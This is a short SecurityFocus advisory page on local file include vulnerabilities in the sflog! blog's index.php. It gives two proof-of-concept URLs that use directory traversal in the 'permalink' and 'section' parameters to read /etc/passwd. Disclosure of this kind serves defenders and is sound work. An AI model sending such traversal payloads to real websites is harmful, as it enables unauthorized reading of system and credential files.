Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

sflog! 'index.php' Multiple Local File Include Vulnerabilities

Attackers may exploit these issues through a browser.

The following proof-of-concept URIs are available:

http://www.example.com/sflog/?blog=test&permalink=../../../../../../../../../../etc/passwd
http://www.example.com/sflog/index.php?blog=test&section=../../../../../../../../../../etc/passwd







 

Privacy Statement
Copyright 2008, SecurityFocus